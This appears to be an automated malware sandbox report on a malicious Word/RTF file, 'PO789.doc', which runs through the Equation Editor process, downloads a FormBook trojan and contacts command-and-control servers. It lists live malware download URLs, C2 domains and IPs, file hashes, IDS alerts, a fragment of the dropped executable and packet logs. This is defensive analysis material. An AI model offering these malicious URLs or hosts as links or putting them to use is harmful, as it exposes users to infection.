          Domains

Source | Detection | Scanner | Label
peak-tv.tk | 5% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.realstakepool.com/md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i | 0% | Avira URL Cloud | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://www.prestigiousuniforms.com/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i | 0% | Avira URL Cloud | safe
www.carbonfiber.cloud/md4m/ | 0% | Avira URL Cloud | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://peak-tv.tk/medicomzx.exe | 100% | Avira URL Cloud | malware
http://www.small-icons.com/packs/16x16-free-application-icons.htm | 0% | Avira URL Cloud | safe
http://splashyfish.com/icons/ | 0% | Avira URL Cloud | safe
http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i | 100% | Avira URL Cloud | malware
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://led24.de/iconset/ | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i | 100% | Avira URL Cloud | malware
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
peak-tv.tk | 2.58.149.41 | true | true | | unknown
www.extraordinarymiracle.com | 109.94.209.123 | true | true | | unknown
www.realstakepool.com | 91.195.240.13 | true | true | | unknown
shops.myshopify.com | 23.227.38.74 | true | true | | unknown
muzicalbox.com | 34.102.136.180 | true | false | | unknown
www.danielkcarter.store | 172.67.181.75 | true | false | | unknown
www.muzicalbox.com | unknown | unknown | true | | unknown
www.prestigiousuniforms.com | unknown | unknown | true | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.realstakepool.com/md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i | true | Avira URL Cloud: safe | unknown
http://www.prestigiousuniforms.com/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i | true | Avira URL Cloud: safe | unknown
www.carbonfiber.cloud/md4m/ | true | Avira URL Cloud: safe | low
http://peak-tv.tk/medicomzx.exe | true | Avira URL Cloud: malware | unknown
http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i | false | Avira URL Cloud: malware | unknown
http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i | true | Avira URL Cloud: malware | unknown

                                                                          Contacted IPs

                                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
2.58.149.41 | peak-tv.tk | Netherlands | 395800 | GBTCLOUDUS | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | muzicalbox.com | United States | 15169 | GOOGLEUS | false
109.94.209.123 | www.extraordinarymiracle.com | Russian Federation | 202376 | ARVID-LOGICUMEE | true
91.195.240.13 | www.realstakepool.com | Germany | 47846 | SEDO-ASDE | true

                                                                          General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 552782
Start date: 13.01.2022
Start time: 18:16:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 44s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: PO789.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@9/9@6/5
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 14.9% (good quality ratio 13.9%)
• Quality average: 68.4%
• Quality standard deviation: 29.6%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 120
• Number of non-executed functions: 36
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                          Simulations

                                                                          Behavior and APIs

Time | Type | Description
18:16:18 | API Interceptor | 36x Sleep call for process: EQNEDT32.EXE modified
18:16:20 | API Interceptor | 86x Sleep call for process: medicomsh78694.exe modified
18:16:44 | API Interceptor | 138x Sleep call for process: msdt.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

Match | Associated Sample Name / URL | Detection | Context
2.58.149.41 | Payment Slip.doc | malicious | paxz.tk/aguerozx.exe
2.58.149.41 | POs_002.doc | malicious | kizitox.cf/dozzyzx.exe
2.58.149.41 | INQUIRY 12 7.doc | malicious | paxz.tk/hussanzx.exe
2.58.149.41 | INF.doc | malicious | peak-tv.tk/lewiszx.exe
2.58.149.41 | 12-1-22.doc | malicious | paxz.tk/macdonzx.exe
2.58.149.41 | 002774936211.doc | malicious | kizitox.cf/kdotzx.exe
2.58.149.41 | 10-1-22.doc | malicious | paxz.tk/macdonzx.exe
2.58.149.41 | INF.doc | malicious | peak-tv.tk/lewiszx.exe
2.58.149.41 | POs_001.doc | malicious | kizitox.cf/dozzyzx.exe
2.58.149.41 | quotationNew Order.doc | malicious | kizitox.cf/mazx.exe
2.58.149.41 | GTP96789.doc | malicious | paxz.tk/emezx.exe
2.58.149.41 | RFQ8086A_461A_0000086_300_3550_2022.doc | malicious | paxz.tk/simonzx.exe
2.58.149.41 | MR-CPSeriesMortuaryCorpseRefrigeratorFreezer.doc | malicious | kizitox.cf/kdotzx.exe
2.58.149.41 | po_02.doc | malicious | kizitox.cf/dozzyzx.exe
2.58.149.41 | PO-DOC_MDR0307_019.doc | malicious | kizitox.cf/plugmanzx.exe
2.58.149.41 | Proof of payment.doc | malicious | paxz.tk/aguerozx.exe
2.58.149.41 | New_Order.doc__.rtf | malicious | paxz.tk/simonzx.exe
2.58.149.41 | STATEMENT OF ACCOUNT SEPT-2021-DEC 2021.doc | malicious | peak-tv.tk/luizx.exe
2.58.149.41 | BANK DETAILS.doc | malicious | peak-tv.tk/wealthzx.exe
2.58.149.41 | 58961575.doc | malicious | paxz.tk/emezx.exe

                                                                          Domains


ASN


JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 707072
Entropy (8bit): 7.1557818019777
Encrypted: false
SSDEEP: 6144:Y+xYKKAB5ADeIVvcDK8OpvlmXsC2GxfjpWHpxFvMUXvoHVgDaiYCpslXGqoohdZy:Y+bYeIVwl5dCWdloqXkz53iA55suuI
MD5: 8807C2E0F2973A22812AF6E61BA72667
SHA1: 20BDCA62A8D0C98F8DB2C9FF1E3AB13DC4849514
SHA-256: 4228CCE8278F840721D9F04FEA140B942C14D45938D07C1FA36A29712DDA441C
SHA-512: 05AF426C3133B5B71F74E6754C139ACD8BAA6C3A492719C223403C9F859CDF9EFE12739D8B35C9CB2E4126FA54080E91894AB6A40E417894EF14A218B88FA527
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 34%
• Antivirus: ReversingLabs, Detection: 51%
IE Cache URL: http://peak-tv.tk/medicomzx.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 5632
Entropy (8bit): 4.123128557938953
Encrypted: false
SSDEEP: 96:SB9fMP/FyI+brWXL9TQ9IJp0Mhrq/2BpWYjuGFkZu:SB9UP/SrWXLiWaMYOPOF
MD5: 6D550004A108E472ACB60AFA74AECBAD
SHA1: A43A215E06FEAA84FD26BBB00439A041448B484A
SHA-256: 5B58844E1C55D5D069C4E7D10EF267AD2F0C93E239265FD8FB51930CED238C6C
SHA-512: 3CFD4B10E88C6CA7B31AA12BAC4B2642DFC50B426A0A597D2A836578A3A3C4FD4F90756A3FCE2AC43A52AB1E46FA356D7BA3F7AA0962B0D024131504A7CF1E8A
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A1ACA359-D73C-4E90-86E8-AE0089CF8F67}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 9216
Entropy (8bit): 3.481183177856214
Encrypted: false
SSDEEP: 192:o3uVHzr2R9THXsibKVEbyKbQTjKiqeOCs0XqK2WP1vTOkpc76EnZ:o+VzrkBNPecQTee/aK2+OEiZ
MD5: 1ED77075EA7EA8E9B6386E63B1F8F682
SHA1: 7F3E9A5B4FEC84D3298D32A6BB1D8A8E89866C24
SHA-256: AB2DDDC94896F581777EA638395F5FAC4F42F368AEC3932BDF1EDA21328B5866
SHA-512: E58451151D174E46965E7DD18D785A273571BE2CAADC2F86C97E695EBD7C2AD4967D8C15DA14C7705023E64B4B330201A374080F759C6D9A24B3227AD083699C
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO789.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Fri Jan 14 01:16:16 2022, length=21489, window=hide
Category: dropped
Size (bytes): 985
Entropy (8bit): 4.502552260196471
Encrypted: false
SSDEEP: 12:81exRgXg/XAlCPCHaXeBhB/OW9qX+WvvTicvbp04loDtZ3YilMMEpxRljK2QMTd+:8an/XTuzLINGeHoDv3qSAQd7Qy
MD5: 8BDC5B1FDC8B42BFCED301566877791E
SHA1: D296ED0B91FA1FD37358AD09E026DD88C1270962
SHA-256: 65F2C698BA65C4FD314A4470EC3940F5EA2CD6E1C19AC315D0DF1932FEE46F3C
SHA-512: 81058FD9BAE0CED6E9EDAE6C25AB053FAEA2347357B2316B0DE6A25A6CE8EDE5C0AC8F6A2B3B527EE775140FF50FCBBA22223C1E4C5A712B315D0B6C81B53659
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 61
Entropy (8bit): 4.643794821759313
Encrypted: false
SSDEEP: 3:bDuMJlt+jomX1gHjov:bCmQIDy
MD5: DAE12E95560EA2CA4F86AC4515A68F33
SHA1: 5A1ACBDF73F62480BEFE51B3DF654745BF6AAE74
SHA-256: 141FA7A3959432D83CCA3841FDDFDA6108B2BCA2FFAED58CE4146A9D2BF898AD
SHA-512: 152A5EA111E388591175CC2386DAE6ED8CF7B4CCCED0B73339142FAA41122B94D64098F9F8312B7B6BA2078609438DCA5F617773C68310A45753F9E7D2B54381
Malicious: false
Preview: [folders]..Templates.LNK=0..PO789.LNK=0..[doc]..PO789.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: false
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                          C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):707072
                                                                          Entropy (8bit):7.1557818019777
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Y+xYKKAB5ADeIVvcDK8OpvlmXsC2GxfjpWHpxFvMUXvoHVgDaiYCpslXGqoohdZy:Y+bYeIVwl5dCWdloqXkz53iA55suuI
                                                                          MD5:8807C2E0F2973A22812AF6E61BA72667
                                                                          SHA1:20BDCA62A8D0C98F8DB2C9FF1E3AB13DC4849514
                                                                          SHA-256:4228CCE8278F840721D9F04FEA140B942C14D45938D07C1FA36A29712DDA441C
                                                                          SHA-512:05AF426C3133B5B71F74E6754C139ACD8BAA6C3A492719C223403C9F859CDF9EFE12739D8B35C9CB2E4126FA54080E91894AB6A40E417894EF14A218B88FA527
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 34%
                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................$...`#............................................("...*&..(#....*.s$........s%........s&........s'........s(........*...0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0..<........~.....(......,!r...p.....(/...o0...s1............~.....+..*.0...........~.....+..*".......*.0..&........(....r%..p~....o2...(3.....t$....+..*Vs....(4...t.........*..(5...*.0..........
                                                                          C:\Users\user\Desktop\~$PO789.doc
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:true
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                          Static File Info

                                                                          General

                                                                          File type:Rich Text Format data, unknown version
                                                                          Entropy (8bit):3.6305852926898945
                                                                          TrID:
                                                                          • Rich Text Format (5005/1) 55.56%
                                                                          • Rich Text Format (4004/1) 44.44%
                                                                          File name:PO789.doc
                                                                          File size:21489
                                                                          MD5:6c28e31d32e97db724188025636ac25e
                                                                          SHA1:c5818d1883785293dfab00d2c1389b82cc74ad60
                                                                          SHA256:c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
                                                                          SHA512:a22a65663670274098a9259314e1789b97d8ca1a11e8758eb08ee673d19755bf836f2346167dfaec5839a2ab77ff45c922e792b609c17c3c92d771c5d4af8463
                                                                          SSDEEP:384:d5vSln/51N+CYmIX1GeQC9/x7U3AJul04:d5vSln/N+LGeQCmwue4
                                                                          File Content Preview:{\rtf872.%^@+*&78-[/?_?,0.638<~-6?%';[.1,#35-4#^`.??.@[3_.4,33&1$/9*]'7?*?%~+6?0.@!?_'6)5->?$]~+:;*,.;?./1&46|'_+]??!`?[+*;=@??|'?79'%+;%?=~'|,+.$6??%*1($9?,`?,;.;]&%*!_566=##@_|~+/%5$?%$190`%'30,+%7=|.[:.,?]18[<1~>).?>3#*,.?`41@27?3.#;@;2_?6014~#%@0+(>50

                                                                          File Icon

                                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                                          Static RTF Info

                                                                          Objects

                                                                          Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                                          0 | 000010C4h | | | | | | | | no
                                                                          1 | 00001073h | | | | | | | | no

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                          01/13/22-18:18:34.850775 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 23.227.38.74 | 192.168.2.22
                                                                          01/13/22-18:18:53.504983 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49170 | 80 | 192.168.2.22 | 34.102.136.180
                                                                          01/13/22-18:18:53.504983 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49170 | 80 | 192.168.2.22 | 34.102.136.180
                                                                          01/13/22-18:18:53.504983 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49170 | 80 | 192.168.2.22 | 34.102.136.180
                                                                          01/13/22-18:18:53.620393 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49170 | 34.102.136.180 | 192.168.2.22
                                                                          01/13/22-18:19:03.995932 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49172 | 80 | 192.168.2.22 | 91.195.240.13
                                                                          01/13/22-18:19:03.995932 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49172 | 80 | 192.168.2.22 | 91.195.240.13
                                                                          01/13/22-18:19:03.995932 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49172 | 80 | 192.168.2.22 | 91.195.240.13

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          Jan 13, 2022 18:17:00.266253948 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266268969 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266269922 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266287088 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266287088 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266303062 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266303062 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266319990 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266321898 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266335964 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266335964 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266350985 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266352892 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266367912 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266371012 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266382933 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266386032 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266397953 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266402006 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266415119 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266431093 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266443968 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266448021 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266455889 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266463041 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266473055 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266479015 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266489029 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266494989 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266510963 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266510963 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266526937 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266530991 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266542912 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266549110 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266561031 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266566992 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266577005 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266582012 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266592026 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266598940 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266608953 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.266617060 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266634941 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.266652107 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.267049074 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293252945 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293283939 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293297052 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293313980 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293327093 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293344021 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293360949 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293376923 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293392897 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293394089 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293409109 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293416023 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293426991 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293433905 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293451071 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293464899 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293478966 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293498039 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293510914 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293514013 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293528080 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293530941 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293549061 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293555021 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293565989 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293566942 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293582916 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293584108 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293601036 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293606043 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293617964 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293617964 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293634892 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293637991 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293653011 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293653011 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293669939 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293670893 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293687105 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293687105 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293703079 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293703079 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293719053 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293720007 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293736935 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293737888 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293752909 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293755054 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293771982 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293772936 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293787003 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293790102 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293803930 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293807983 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293819904 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293824911 CET80491672.58.149.41192.168.2.22
